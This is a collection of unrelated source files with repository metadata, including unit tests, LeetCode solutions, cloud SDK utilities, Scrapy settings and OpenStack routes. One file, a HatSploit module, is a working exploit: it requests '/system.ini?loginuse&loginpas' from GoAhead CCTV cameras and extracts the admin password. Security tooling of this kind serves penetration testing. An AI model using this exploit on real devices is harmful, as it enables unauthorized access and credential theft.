# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import IECore
class OptionsTest( unittest.TestCase ) :
def testCopy( self ) :
o = IECore.Options()
o.options["test"] = IECore.FloatData( 10 )
oo = o.copy()
self.assertEqual( o, oo )
def testConstructFromDict( self ) :
o = IECore.Options( {
"a" : IECore.StringData( "a" ),
"b" : IECore.IntData( 10 ),
} )
self.assertEqual( len( o.options ), 2 )
self.assertEqual( o.options["a"], IECore.StringData( "a" ) )
self.assertEqual( o.options["b"], IECore.IntData( 10 ) )
def testHash( self ) :
o1 = IECore.Options()
o2 = IECore.Options()
self.assertEqual( o1.hash(), o2.hash() )
o1.options["a"] = IECore.StringData( "a" )
self.assertNotEqual( o1.hash(), o2.hash() )
o2.options["a"] = IECore.StringData( "a" )
self.assertEqual( o1.hash(), o2.hash() )
if __name__ == "__main__":
unittest.main()
authors: ["[email protected]"]
blob_id: 49716fffe1d3d747365e83abe99f48f2a62222a2 | directory_id: be5c86e8fe3f5836b7d2097dd5272c72b5b28f15
path: /binary-search/Python/0374-guess-number-higher-or-lower.py | content_id: bca7b49cffd223314f15f7da64b8be501150cf07
detected_licenses: ["Apache-2.0"] | license_type: permissive | repo_name: lemonnader/LeetCode-Solution-Well-Formed
snapshot_id: d24674898ceb5441c036016dc30afc58e4a1247a | revision_id: baabdb1990fd49ab82a712e121f49c4f68b29459 | branch_name: refs/heads/master
visit_date: 2021-04-23T18:49:40.337569 | revision_date: 2020-03-24T04:50:27 | committer_date: 2020-03-24T04:50:27
github_id: 249,972,064 | star_events_count: 1 | fork_events_count: 0
gha_license_id: Apache-2.0 | gha_event_created_at: 2020-03-25T12:26:25 | gha_created_at: 2020-03-25T12:26:24 | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 523 | extension: py
content:
# The guess API is already defined for you.
# @param num, your guess
# @return -1 if my number is lower, 1 if my number is higher, otherwise return 0
def guess(num):
pass
class Solution(object):
def guessNumber(self, n):
left = 1
right = n
while left < right:
mid = (left + right) >> 1
if guess(mid) == 1:
left = mid + 1
else:
right = mid
        # The last number remaining must be the answer, so no post-processing is needed
return left
authors: ["[email protected]"]
blob_id: 7fe354c98d8d01ba22505c5e5c51b733782f34d6 | directory_id: a3cc7286d4a319cb76f3a44a593c4a18e5ddc104
path: /lib/googlecloudsdk/api_lib/ml/vision/util.py | content_id: d48320c61c682ef73501c2c44fe8ff497a756db5
detected_licenses: ["LicenseRef-scancode-unknown-license-reference", "Apache-2.0"] | license_type: permissive | repo_name: jordanistan/Google-Cloud-SDK
snapshot_id: f2c6bb7abc2f33b9dfaec5de792aa1be91154099 | revision_id: 42b9d7914c36a30d1e4b84ae2925df7edeca9962 | branch_name: refs/heads/master
visit_date: 2023-09-01T01:24:53.495537 | revision_date: 2023-08-22T01:12:23 | committer_date: 2023-08-22T01:12:23
github_id: 127,072,491 | star_events_count: 0 | fork_events_count: 1
gha_license_id: NOASSERTION | gha_event_created_at: 2023-08-22T01:12:24 | gha_created_at: 2018-03-28T02:31:19 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 2,070 | extension: py
content:
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for gcloud ml vision commands."""
import os
import re
from googlecloudsdk.api_lib.util import apis
from googlecloudsdk.core import exceptions
VISION_API = 'vision'
VISION_API_VERSION = 'v1'
IMAGE_URI_FORMAT = r'^(https{,1}?|gs)://'
class Error(exceptions.Error):
"""Error for gcloud ml vision commands."""
class ImagePathError(Error):
"""Error if an image path is improperly formatted."""
def GetImageFromPath(path):
"""Builds an Image message from a path.
Args:
path: the path arg given to the command.
Raises:
ImagePathError: if the image path does not exist and does not seem to be
a remote URI.
Returns:
vision_v1_messages.Image: an image message containing information for the
API on the image to analyze.
"""
messages = apis.GetMessagesModule(VISION_API, VISION_API_VERSION)
image = messages.Image()
if os.path.isfile(path):
with open(path, 'rb') as content_file:
image.content = content_file.read()
elif re.match(IMAGE_URI_FORMAT, path):
image.source = messages.ImageSource(imageUri=path)
else:
raise ImagePathError(
'The image path does not exist locally or is not properly formatted. '
'A URI for a remote image must be a Google Cloud Storage image URI, '
'which must be in the form `gs://bucket_name/object_name`, or a '
'publicly accessible image HTTP/HTTPS URL. Please double-check your '
'input and try again.')
return image
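# Usage sketch (hypothetical paths, for illustration only):
#   GetImageFromPath('gs://my-bucket/img.jpg')  # -> Image with source.imageUri set
#   GetImageFromPath('/tmp/img.jpg')            # -> Image with the raw bytes in .content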
|
[
"[email protected]"
] | |
14dfa0a6647e1c79cd33c076529270c16b054056
|
09933dafbbc12fe20c405362850ffbf315b01a58
|
/src-tag-ent/gen_data.py
|
fbddab6277c97047553db17485a2206acc0a6875
|
[] |
no_license
|
johndpope/advrelation
|
1ce1fd4ffc0b7abbea2762c3a8941b469c4f7cf5
|
bc77dcfa8669d612aded6a053fff6766798bed14
|
refs/heads/master
| 2020-03-22T22:55:48.664711 | 2018-03-03T04:43:11 | 2018-03-03T04:43:11 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,447 |
py
|
import tensorflow as tf
import config as config_lib
from inputs import dataset, semeval_v2
tf.logging.set_verbosity(tf.logging.INFO)
config = config_lib.get_config()
semeval_text = semeval_v2.SemEvalCleanedTextData(
config.semeval_dir, config.semeval_train_file, config.semeval_test_file)
# length statistics
semeval_text.length_statistics()
# gen vocab
vocab = dataset.Vocab(config.out_dir, config.vocab_file)
# vocab.generate_vocab(semeval_text.tokens())
# # trim embedding
# embed = dataset.Embed(config.out_dir, config.trimmed_embed300_file, config.vocab_file)
# google_embed = dataset.Embed(config.pretrain_embed_dir,
# config.google_embed300_file, config.google_words_file)
# embed.trim_pretrain_embedding(google_embed)
# build SemEval record data
semeval_text.set_vocab(vocab)
tag_encoder = dataset.Label(config.semeval_dir, config.semeval_tags_file)
semeval_text.set_tags_encoder(tag_encoder)
semeval_record = semeval_v2.SemEvalCleanedRecordData(semeval_text,
config.out_dir, config.semeval_train_record, config.semeval_test_record)
semeval_record.generate_data()
# INFO:tensorflow:(percent, quantile) [(50, 18.0), (70, 22.0), (80, 25.0),
# (90, 29.0), (95, 34.0), (98, 40.0), (100, 97.0)]
# INFO:tensorflow:generate vocab to data/generated/vocab.txt
# INFO:tensorflow:trim embedding to data/generated/embed300.trim.npy
# INFO:tensorflow:generate TFRecord data
|
[
"[email protected]"
] | |
c4fd4774aaf0e10c3720251b62ae4f7fd5eca3ae
|
437428a48278b4e9bc04e1b8acbb33199f409376
|
/modules/exploit/unix/cctv/goahead_password_disclosure.py
|
ae2a949fa5f2033187282244644b19db5808d163
|
[
"MIT"
] |
permissive
|
happylaodu/HatSploit
|
06d18ba2590456241ba61273d9f3d662a8bb26ec
|
9d53f3db85ce38483c6e7d16570ac233c5dd93cf
|
refs/heads/main
| 2023-04-30T20:18:37.090185 | 2021-06-02T20:23:08 | 2021-06-02T20:23:08 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,399 |
py
|
#!/usr/bin/env python3
#
# MIT License
#
# Copyright (c) 2020-2021 EntySec
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
from core.lib.module import Module
from utils.http.http import HTTPClient
from utils.string.string import StringTools
class HatSploitModule(Module, HTTPClient, StringTools):
details = {
'Name': "CCTV GoAhead Camera Password Disclosure",
'Module': "exploit/unix/cctv/goahead_password_disclosure",
'Authors': [
'Ivan Nikolsky (enty8080)',
'Pierre Kim (pierrekim)'
],
'Description': "CCTV GoAhead Camera password disclosure exploit.",
'Comments': [
''
],
'Platform': "unix",
'Risk': "high"
}
options = {
'RHOST': {
'Description': "Remote host.",
'Value': None,
'Type': "ip",
'Required': True
},
'RPORT': {
'Description': "Remote port.",
'Value': 81,
'Type': "port",
'Required': True
},
'USERNAME': {
'Description': "Default username.",
'Value': "admin",
'Type': None,
'Required': True
}
}
def exploit(self, remote_host, remote_port, username):
self.output_process("Generating payload...")
payload = '/system.ini?loginuse&loginpas'
self.output_process("Sending payload...")
response = self.http_request(
method="GET",
host=remote_host,
port=remote_port,
path=payload
)
if response is None or response.status_code != 200:
self.output_error("Failed to send payload!")
return
gathered_data = response.text
strings = self.extract_strings(gathered_data)
if username in strings:
username_index = strings.index(username)
password = strings[username_index + 1]
self.print_table("Credentials", ('Username', 'Password'), (username, password))
else:
self.output_warning(f"Target vulnerable, but default username is not {username}.")
def run(self):
remote_host, remote_port, username = self.parse_options(self.options)
self.output_process(f"Exploiting {remote_host}...")
self.exploit(remote_host, remote_port, username)
|
[
"[email protected]"
] | |
ec20e0f130c9b07be9f40df8385ecc71d1678676
|
1b3fc35ada474601a76de3c2908524336d6ca420
|
/day07/作业/tencent/tencent/settings.py
|
d96bd9dfc78cc95ce6fafa6d33a2745ee7a9c4af
|
[] |
no_license
|
dqsdatalabs/Internet-worm
|
db3677e65d11542887adcde7719b7652757a3e32
|
62f38f58b4fa7643c482077f5ae18fff6fd81915
|
refs/heads/master
| 2022-01-16T14:29:52.184528 | 2018-12-25T08:46:08 | 2018-12-25T08:46:08 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,079 |
py
|
# -*- coding: utf-8 -*-
# Scrapy settings for tencent project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://doc.scrapy.org/en/latest/topics/settings.html
# https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'tencent'
SPIDER_MODULES = ['tencent.spiders']
NEWSPIDER_MODULE = 'tencent.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'tencent (+http://www.yourdomain.com)'
# Obey robots.txt rules
ROBOTSTXT_OBEY = False
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See https://doc.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See https://doc.scrapy.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'tencent.middlewares.TencentSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'tencent.middlewares.TencentDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See https://doc.scrapy.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See https://doc.scrapy.org/en/latest/topics/item-pipeline.html
ITEM_PIPELINES = {
'tencent.pipelines.TencentPipeline': 300,
}
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
|
[
"[email protected]"
] | |
a7eaaf704b1ca43d729d3db96987a74947dc2a7e
|
ac42f1d918bdbd229968cea0954ed75250acd55c
|
/admin/dashboard/openstack_dashboard/dashboards/admin/networks/urls.py
|
4cd1b60079c3d722609128d7ad46956075f117f1
|
[
"Apache-2.0"
] |
permissive
|
naanal/product
|
016e18fd2f35608a0d8b8e5d2f75b653bac7111a
|
bbaa4cd60d4f2cdda6ce4ba3d36312c1757deac7
|
refs/heads/master
| 2020-04-03T22:40:48.712243 | 2016-11-15T11:22:00 | 2016-11-15T11:22:00 | 57,004,514 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,206 |
py
|
# Copyright 2012 NEC Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.conf.urls import include
from django.conf.urls import url
from openstack_dashboard.dashboards.admin.networks.agents \
import views as agent_views
from openstack_dashboard.dashboards.admin.networks.ports \
import urls as port_urls
from openstack_dashboard.dashboards.admin.networks.ports \
import views as port_views
from openstack_dashboard.dashboards.admin.networks.subnets \
import urls as subnet_urls
from openstack_dashboard.dashboards.admin.networks.subnets \
import views as subnet_views
from openstack_dashboard.dashboards.admin.networks import views
NETWORKS = r'^(?P<network_id>[^/]+)/%s$'
urlpatterns = [
url(r'^$', views.IndexView.as_view(), name='index'),
url(r'^create/$', views.CreateView.as_view(), name='create'),
url(NETWORKS % 'update', views.UpdateView.as_view(), name='update'),
url(NETWORKS % 'detail', views.DetailView.as_view(), name='detail'),
url(NETWORKS % 'agents/add',
agent_views.AddView.as_view(), name='adddhcpagent'),
url(NETWORKS % 'subnets/create',
subnet_views.CreateView.as_view(), name='addsubnet'),
url(NETWORKS % 'ports/create',
port_views.CreateView.as_view(), name='addport'),
url(r'^(?P<network_id>[^/]+)/subnets/(?P<subnet_id>[^/]+)/update$',
subnet_views.UpdateView.as_view(), name='editsubnet'),
url(r'^(?P<network_id>[^/]+)/ports/(?P<port_id>[^/]+)/update$',
port_views.UpdateView.as_view(), name='editport'),
url(r'^subnets/', include(subnet_urls, namespace='subnets')),
url(r'^ports/', include(port_urls, namespace='ports')),
]
|
[
"[email protected]"
] | |
3ca35f3537a824472f63b7833626c34abcf1e3e6
|
befafdde28c285c049b924fa58ce6240a4ae8d3c
|
/python_solution/Backtracking/40_CombinationSumII.py
|
3c2f5d5b703d0d38f2bbe30c891c104f20adad1e
|
[] |
no_license
|
Dimen61/leetcode
|
3364369bda2255b993581c71e2b0b84928e817cc
|
052bd7915257679877dbe55b60ed1abb7528eaa2
|
refs/heads/master
| 2020-12-24T11:11:10.663415 | 2017-08-15T14:54:41 | 2017-08-15T14:54:41 | 73,179,221 | 4 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,530 |
py
|
class Solution(object):
def combinationSum2(self, candidates, target):
"""
:type candidates: List[int]
:type target: int
:rtype: List[List[int]]
"""
enable_lst = [False for i in range(target+1)]
enable_lst[0] = True
candidates.sort()
for i in range(target):
if enable_lst[i]:
for num in candidates:
if i+num <= target:
enable_lst[i+num] = True
if not enable_lst[target]: return []
tmp_result = []
def search(total, index, combs):
"""
:type total: int
:type index: int
:rtype: void
"""
if total == 0:
tmp_result.append(combs)
return
elif index >= len(candidates) or total < 0:
return
num = candidates[index]
if total-num >= 0 and enable_lst[total-num]:
search(total-num, index+1, combs+[num])
search(total, index+1, combs)
search(target, 0, [])
tmp_result.sort()
result = []
last = None
for item in tmp_result:
if not last:
last = item
result.append(item)
else:
if last != item:
last = item
result.append(item)
return result
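# Usage sketch (the classic LC 40 example; duplicates are removed by the
# sort-and-compare pass above):
#   Solution().combinationSum2([10, 1, 2, 7, 6, 1, 5], 8)
#   # -> [[1, 1, 6], [1, 2, 5], [1, 7], [2, 6]]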
|
[
"[email protected]"
] | |
8c951a4ff5799e9f19a66c7679c2cbb6760522b1
|
593ecc21a7164ec293f23d75423e71ab3d9f3c54
|
/LC29.py
|
4851f8eb59c6ba7f464b3e832b78b17bb3b30c3a
|
[] |
no_license
|
luckmimi/leetcode
|
e297c11960f0c72370523e5594d789bc4d55cf7c
|
2257c6202e823a5cd71b630441c430f1bd08a896
|
refs/heads/master
| 2022-07-11T22:36:02.634148 | 2022-06-30T22:57:20 | 2022-06-30T22:57:20 | 214,880,666 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 516 |
py
|
class Solution:
def divide(self, dividend: int, divisor: int) -> int:
sign = -1 if (dividend < 0) ^ (divisor < 0) else 1
a = abs(dividend)
b = abs(divisor)
res = 0
while b<= a:
mul = 1
tmp = b
while a >= (tmp <<1):
tmp <<= 1
mul <<= 1
res += mul
a -= tmp
res *= sign
if res > 2**31 -1 :
return 2** 31 -1
else:
return res
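# Worked example (a sketch): divide(43, 5)
#   tmp doubles 5 -> 10 -> 20 -> 40 with mul reaching 8; 43 - 40 = 3 < 5,
#   so res = 8, matching 43 // 5.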
|
[
"[email protected]"
] | |
5fd1184dce2377d92e2ff473b987d718c97bf42f
|
5bd3122d230471b048429f5e9c49a0b39c8a54fc
|
/Atcoder_contests/ARC/R102A.py
|
5e0b5a9bf32372b1adfd5381f0b6c1bc75432986
|
[] |
no_license
|
nao1412/Competitive_Programing_Codes
|
e230e2fa85027e41c5ee062083801bb299effe9b
|
98c29b5ba75e75502cf27fcf365a7aedcd6c273c
|
refs/heads/main
| 2023-06-05T18:45:59.733301 | 2021-06-23T15:02:25 | 2021-06-23T15:02:25 | 374,061,897 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 541 |
py
|
import sys
sys.setrecursionlimit(10**7)  # raise the recursion limit
import math
def I(): return int(input())
def LI(): return list(map(int, input().split()))
def MI(): return map(int, input().split())
def S(): return input()
def LS(): return list(map(str, input().split()))
def H(n): return [input() for i in range(n)]
mod = 10**9 + 7
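# This appears to solve ARC 102 A: count ordered triples (a, b, c) in 1..n whose
# pairwise sums a+b, b+c, c+a are all divisible by k. That holds iff all three
# are 0 mod k, or, when k is even, all three are k/2 mod k; hence n1**3 + n2**3.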
def main():
n, k = MI()
if k % 2 == 0:
n1 = n // k
n2 = n1
if n % k >= k // 2:
n2 = n1 + 1
else:
n1 = n // k
n2 = 0
print(n1**3+n2**3)
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
b78816d355385165c2d46725802b6c6001eae314
|
b1c99061474c4e2f2653f6f3d83931c949c58b13
|
/Basic/chapter3/ReplaceTest.py
|
1f7aca0428b31758f691b5eb62156031c05dd93f
|
[] |
no_license
|
hyperaeon/python
|
df75346040a5ccc588e21b0d761493c59e1a4fe3
|
21d10ef7af3227d29092a6720666c0db8e418ec4
|
refs/heads/master
| 2016-09-14T08:58:53.794960 | 2016-04-26T05:34:56 | 2016-04-26T05:34:56 | 57,100,745 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 222 |
py
|
__author__ = 'hzliyong'
cookie = '_da_ntes_uid=3LhpAfObU48aiOR0b28yZYXv;'
cookie = cookie.replace(';','')
print(cookie)
type = 'a'
if type == 'a':
list = 'type a'
if type == 'b':
list = 'type b'
print(list)
|
[
"[email protected]"
] | |
b7b297c84c0c3d1db89a06f2929ee93d987e0691
|
eab1abf41e3e1bd276258be7aedfb4f2dfcc1b1e
|
/web/mydjango/geoapp/admin.py
|
3d75606cf3e3ff9b2630865dc8782c03b65cc335
|
[] |
no_license
|
javiermaly/docker-python3-django2-postgres-postgis-geodjango-nginx
|
1732e0df8d1bd4624b3385ac6757b48060814814
|
8ea5f2c9ed90013bab76b468d44e7cbabf8122f6
|
refs/heads/master
| 2021-11-25T14:47:09.901801 | 2018-03-26T01:03:39 | 2018-03-26T01:03:39 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 186 |
py
|
from django.contrib import admin
from .models import GeoAlgo
@admin.register(GeoAlgo)
class GeoAlgoAdmin(admin.ModelAdmin):
list_display = ['nombre']
search_fields = ['nombre']
|
[
"[email protected]"
] | |
3c0948318554ab6edf9a4f53a5192b3d04e696dd
|
a4ea525e226d6c401fdb87a6e9adfdc5d07e6020
|
/src/azure-cli/azure/cli/command_modules/network/aaz/profile_2018_03_01_hybrid/network/vnet_gateway/_list_learned_routes.py
|
789b238597180231c9dcdc90049d592a0ae04769
|
[
"MIT",
"BSD-3-Clause",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MPL-2.0",
"LGPL-2.1-only",
"Apache-2.0",
"LGPL-2.1-or-later",
"BSD-2-Clause"
] |
permissive
|
Azure/azure-cli
|
13340eeca2e288e66e84d393fa1c8a93d46c8686
|
a40fd14ad0b6e89720a2e58d4d9be3a6ce1535ca
|
refs/heads/dev
| 2023-08-17T06:25:37.431463 | 2023-08-17T06:00:10 | 2023-08-17T06:00:10 | 51,040,886 | 4,018 | 3,310 |
MIT
| 2023-09-14T11:11:05 | 2016-02-04T00:21:51 |
Python
|
UTF-8
|
Python
| false | false | 6,877 |
py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
#
# Code generated by aaz-dev-tools
# --------------------------------------------------------------------------------------------
# pylint: skip-file
# flake8: noqa
from azure.cli.core.aaz import *
@register_command(
"network vnet-gateway list-learned-routes",
)
class ListLearnedRoutes(AAZCommand):
"""This operation retrieves a list of routes the virtual network gateway has learned, including routes learned from BGP peers.
:example: Retrieve a list of learned routes.
az network vnet-gateway list-learned-routes -g MyResourceGroup -n MyVnetGateway
"""
_aaz_info = {
"version": "2017-10-01",
"resources": [
["mgmt-plane", "/subscriptions/{}/resourcegroups/{}/providers/microsoft.network/virtualnetworkgateways/{}/getlearnedroutes", "2017-10-01"],
]
}
AZ_SUPPORT_NO_WAIT = True
def _handler(self, command_args):
super()._handler(command_args)
return self.build_lro_poller(self._execute_operations, self._output)
_args_schema = None
@classmethod
def _build_arguments_schema(cls, *args, **kwargs):
if cls._args_schema is not None:
return cls._args_schema
cls._args_schema = super()._build_arguments_schema(*args, **kwargs)
# define Arg Group ""
_args_schema = cls._args_schema
_args_schema.resource_group = AAZResourceGroupNameArg(
required=True,
)
_args_schema.name = AAZStrArg(
options=["-n", "--name"],
help="Name of the VNet gateway.",
required=True,
id_part="name",
)
return cls._args_schema
def _execute_operations(self):
self.pre_operations()
yield self.VirtualNetworkGatewaysGetLearnedRoutes(ctx=self.ctx)()
self.post_operations()
@register_callback
def pre_operations(self):
pass
@register_callback
def post_operations(self):
pass
def _output(self, *args, **kwargs):
result = self.deserialize_output(self.ctx.vars.instance, client_flatten=True)
return result
class VirtualNetworkGatewaysGetLearnedRoutes(AAZHttpOperation):
CLIENT_TYPE = "MgmtClient"
def __call__(self, *args, **kwargs):
request = self.make_request()
session = self.client.send_request(request=request, stream=False, **kwargs)
if session.http_response.status_code in [202]:
return self.client.build_lro_polling(
self.ctx.args.no_wait,
session,
self.on_200,
self.on_error,
lro_options={"final-state-via": "location"},
path_format_arguments=self.url_parameters,
)
if session.http_response.status_code in [200]:
return self.client.build_lro_polling(
self.ctx.args.no_wait,
session,
self.on_200,
self.on_error,
lro_options={"final-state-via": "location"},
path_format_arguments=self.url_parameters,
)
return self.on_error(session.http_response)
@property
def url(self):
return self.client.format_url(
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworkGateways/{virtualNetworkGatewayName}/getLearnedRoutes",
**self.url_parameters
)
@property
def method(self):
return "POST"
@property
def error_format(self):
return "MgmtErrorFormat"
@property
def url_parameters(self):
parameters = {
**self.serialize_url_param(
"resourceGroupName", self.ctx.args.resource_group,
required=True,
),
**self.serialize_url_param(
"subscriptionId", self.ctx.subscription_id,
required=True,
),
**self.serialize_url_param(
"virtualNetworkGatewayName", self.ctx.args.name,
required=True,
),
}
return parameters
@property
def query_parameters(self):
parameters = {
**self.serialize_query_param(
"api-version", "2017-10-01",
required=True,
),
}
return parameters
@property
def header_parameters(self):
parameters = {
**self.serialize_header_param(
"Accept", "application/json",
),
}
return parameters
def on_200(self, session):
data = self.deserialize_http_content(session)
self.ctx.set_var(
"instance",
data,
schema_builder=self._build_schema_on_200
)
_schema_on_200 = None
@classmethod
def _build_schema_on_200(cls):
if cls._schema_on_200 is not None:
return cls._schema_on_200
cls._schema_on_200 = AAZObjectType()
_schema_on_200 = cls._schema_on_200
_schema_on_200.value = AAZListType()
value = cls._schema_on_200.value
value.Element = AAZObjectType()
_element = cls._schema_on_200.value.Element
_element.as_path = AAZStrType(
serialized_name="asPath",
flags={"read_only": True},
)
_element.local_address = AAZStrType(
serialized_name="localAddress",
flags={"read_only": True},
)
_element.network = AAZStrType(
flags={"read_only": True},
)
_element.next_hop = AAZStrType(
serialized_name="nextHop",
flags={"read_only": True},
)
_element.origin = AAZStrType(
flags={"read_only": True},
)
_element.source_peer = AAZStrType(
serialized_name="sourcePeer",
flags={"read_only": True},
)
_element.weight = AAZIntType(
flags={"read_only": True},
)
return cls._schema_on_200
class _ListLearnedRoutesHelper:
"""Helper class for ListLearnedRoutes"""
__all__ = ["ListLearnedRoutes"]
|
[
"[email protected]"
] | |
e7d33cb382cca997ef56c3849ba3489bc73be785
|
fd90b8efa1daaec44b54797e549e0f738f4a5897
|
/jianzhioffer/16. 数值的整数次方.py
|
b6c886f4358eab1f50ae4aa820f45932b011e28a
|
[] |
no_license
|
ddz-mark/LeetCode
|
2a622eeb655398ca9ebd9feee93a52cd114a77c4
|
d557faf87374ad8c65634ee9d9e572b88a54913a
|
refs/heads/master
| 2021-07-12T06:58:57.162657 | 2021-04-18T13:25:03 | 2021-04-18T13:25:03 | 244,403,881 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,809 |
py
|
# Implement the function double Power(double base, int exponent), which raises
# base to the power exponent. Library functions may not be used, and
# big-number handling is not required.
#
# Example 1:
#
# Input: 2.00000, 10
# Output: 1024.00000
# Example 2:
#
# Input: 2.10000, 3
# Output: 9.26100
# Example 3:
#
# Input: 2.00000, -2
# Output: 0.25000
# Explanation: 2^-2 = 1/2^2 = 1/4 = 0.25
# Approach 1: optimize by splitting the exponent into odd and even cases; when
# it is even, x = x * x.
# Parity check: for (m+n) & 1, a result of 0 means (m+n) is even, and a result
# of 1 means (m+n) is odd.
# Recursive idea: work backwards from the target, e.g.:
# when n is odd:  return x * getPow(x, n-1)
# when n is even: return getPow(x * x, n // 2)
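# Worked example of the even/odd split (a sketch):
#   getPow(2, 10) -> getPow(4, 5) -> 4 * getPow(4, 4)
#                 -> 4 * getPow(16, 2) -> 4 * getPow(256, 1) = 4 * 256 = 1024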
class Solution(object):
def myPow(self, x, n):
"""
:type x: float
:type n: int
:rtype: float
"""
        # 1. Iterative version
# n_temp = abs(n)
# sum = 1
# while n_temp > 1:
#
        # if n_temp & 1 == 0:  # even
# x = x * x
# n_temp = n_temp // 2
# else:
# sum = sum * x
# n_temp -= 1
# sum = sum * x
#
# if n < 0:
# return 1 / sum
# elif n ==0:
# return 1
# return sum
        # 2. Recursive version
if n == 0:
return 1
elif n > 0:
return self.getPow(x, n)
else:
return self.getPow(1/x, -n)
def getPow(self, x, n):
        # Recursive algorithm: write the base case (termination condition) first
if n == 1:
return x
        if n & 1 == 0:  # even
return self.getPow(x * x, n // 2)
else:
return x * self.getPow(x, n-1)
if __name__ == '__main__':
ob = Solution()
print(ob.myPow(2.0, 3))
|
[
"[email protected]"
] | |
